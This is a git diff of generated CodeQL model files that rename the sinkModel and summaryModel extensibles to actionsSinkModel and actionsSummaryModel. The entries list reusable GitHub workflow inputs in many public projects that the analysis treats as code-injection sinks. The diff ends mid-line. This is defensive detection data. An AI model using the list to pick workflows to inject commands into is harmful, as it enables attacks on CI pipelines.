extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f8..4a5c66bc7440 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32e..a1e4b624b454 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de9546464..888aed947da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83c..3b5f69e93423 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b10..8e28b46f2c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c94..7f63b48ed848 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f0..e7e42031e047 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf835..0c34609ccefc 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5e..82de946e406e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8a..09c4c2a83c31 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee12461..0e4571fc728b 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe06..6a03acfb11dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1dfe..f41ee1211d3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379e..8a64c0ce5f11 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7c..18e66bf72913 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd026..1ed7561a5334 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6a..738fde2cb865 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad4..c61a63f11443 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf428..fef036f4f297 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd37..b13ba8bc40f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98f..3fb2fefff6b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24c..4344e254be05 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 038f92a53172..2a7c5feafead 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59a..9ccb41c3a8c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9b..b71e6c001d00 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f54275..ff0695c0ef25 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa154828876..9576ce3892a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f5903..b78d61184114 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf53..cbe56806056b 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553f..391bbc6aacb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2d..f8b490726da9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf9..889499eea3d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c667..2dce19050ed7 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1ab..c80f8e732b64 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858b..b85a11d81f2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe3..f8102400cc72 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d882243..1af7b8322035 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a8..c0688a4a5e06 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d4..4e91308a0049 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd58916..bc42c619599d 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9a..68925b294bb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f97..c3ff42ed6049 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d5..964436f33ca8 100644 --- 